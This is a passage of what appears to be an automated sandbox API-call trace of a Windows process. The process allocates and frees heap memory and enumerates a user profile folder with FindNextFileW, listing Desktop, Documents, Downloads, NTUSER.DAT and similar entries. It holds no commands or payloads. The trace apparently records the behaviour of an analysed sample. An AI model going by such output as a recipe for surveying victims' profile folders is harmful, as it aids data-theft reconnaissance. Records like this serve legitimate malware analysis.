ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1bdde9c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1bdde9c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3530cb8 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c548 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c860 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c6a8 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353fef8 | out: hHeap=0x2c0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.879] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c196c20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c196c20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3aa9ca0 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa9ca0 | out: hHeap=0x2c0000) returned 1 [0173.879] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3aa9ca0 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3a5a700 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fd70 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c6a8 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fdd8 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c548 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c860 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3530cb8 | out: hHeap=0x2c0000) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa9ca0 | out: hHeap=0x2c0000) returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3aa9ca0 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa9ca0 | out: hHeap=0x2c0000) returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c860 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c860 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fbd0 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3ac8068 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff78 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c860 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c548 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cc28 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ffe0 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0048 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa00b0 [0173.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fd70 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c6a8 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fdd8 | out: hHeap=0x2c0000) returned 1 [0173.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a700 | out: hHeap=0x2c0000) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fbd0 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c2c7720, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c2c7720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c6a8 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fbd0 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fbd0 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0173.881] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x32b598 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d0a0 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d150 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb068 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fbd0 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fdd8 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fd70 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb0c0 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0118 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb118 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0180 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb170 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff78 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c860 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c548 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ffe0 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0048 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa00b0 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c6a8 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac8068 | out: hHeap=0x2c0000) returned 1 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.882] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3aa9ca0 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa9ca0 | out: hHeap=0x2c0000) returned 1 [0173.882] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c6a8 